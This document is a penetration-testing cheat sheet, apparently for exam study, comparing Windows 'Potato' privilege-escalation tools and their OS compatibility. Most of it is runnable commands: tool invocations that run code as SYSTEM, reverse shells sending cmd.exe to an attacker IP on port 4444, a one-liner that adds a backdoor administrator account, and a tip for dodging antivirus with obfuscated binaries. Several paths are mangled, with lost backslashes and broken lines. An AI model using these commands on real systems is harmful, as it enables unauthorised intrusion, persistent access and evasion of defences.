Potato Attacks Comparison
PrintSpoofer vs JuicyPotato vs GodPotato vs SweetPotato β when to use which, OS compatibility matrix, and current patch/bypass status for Windows privilege escalation.
Overview & Requirement
All "Potato" attacks target SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege). These privileges are commonly held by service accounts (IIS, MSSQL, network services). The attacks trick a SYSTEM-level process into authenticating to a rogue server, then impersonate that token.
# Check current privileges
whoami /priv
# Look for: SeImpersonatePrivilege β EnabledPrintSpoofer
Exploits the Print Spooler service (spoolsv.exe) via named pipe impersonation. Works on Windows 10/Server 2016/2019. Does NOT require COM object enumeration.
# Upload PrintSpoofer64.exe to target
.PrintSpoofer64.exe -i -c cmd
# -i = interactive, -c = command to run as SYSTEM
# Spawn reverse shell as SYSTEM
.PrintSpoofer64.exe -c "C:WindowsTemp
c.exe KALI_IP 4444 -e cmd.exe"
# Works on: Windows 10, Server 2016, Server 2019
# Patched: No (Print Spooler vulnerability class ongoing)JuicyPotato
Uses DCOM + COM server CLSID lookup to escalate via token impersonation. Requires a specific CLSID for the target OS. Patched on Windows 10 1809+ and Server 2019+.
# Find working CLSID for your OS from:
# https://github.com/ohpe/juicy-potato/tree/master/CLSID
.JuicyPotato.exe -l 1337 -p C:WindowsTemp
c.exe \
-a "KALI_IP 4444 -e cmd.exe" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
# -l = COM port, -p = binary, -a = arguments, -c = CLSID
# Works on: Server 2008, 2012, 2016, Windows 7, 8, 10 (pre-1809)
# Patched: Windows 10 1809+, Server 2019+GodPotato
Modern replacement for JuicyPotato. Works on Windows Server 2012β2022 and Windows 8β11. No CLSID enumeration needed. Uses ImpersonateNamedPipeClient.
# Simplest usage β run command as SYSTEM
.GodPotato-NET4.exe -cmd "cmd /c whoami"
# Reverse shell
.GodPotato-NET4.exe -cmd "C:WindowsTemp
c.exe KALI_IP 4444 -e cmd.exe"
# Multiple versions: NET2, NET35, NET4 β match .NET version on target
# Works on: Windows 8β11, Server 2012β2022
# Patched: Not patched as of 2026Comparison Table
| Tool | OS Support | Requirement | CLSID Needed | Status 2026 |
|---|---|---|---|---|
| PrintSpoofer | Win10, Srv2016/2019 | SeImpersonate | No | Working |
| JuicyPotato | Pre-2019 only | SeImpersonate | Yes | Patched on 2019+ |
| GodPotato | Win8β11, Srv2012β2022 | SeImpersonate | No | Working |
| SweetPotato | Win10, Srv2016-2022 | SeImpersonate | No | Working |
| RoguePotato | Win10, Srv2019 | SeImpersonate | No | Working |
Exam Tips
- Default choice for modern systems: GodPotato (broadest compatibility, no CLSID)
- PrintSpoofer if Print Spooler is running and you're on Server 2016/2019
- Verify Print Spooler:
sc query spoolerβ status must be RUNNING - Upload to
C:\Windows\Tempβ writeable by all service accounts - AV may flag these binaries β try obfuscated/compiled versions or use
-cmdto add user instead of spawning shell - Add local admin:
net user hacker Pass123! /add && net localgroup administrators hacker /add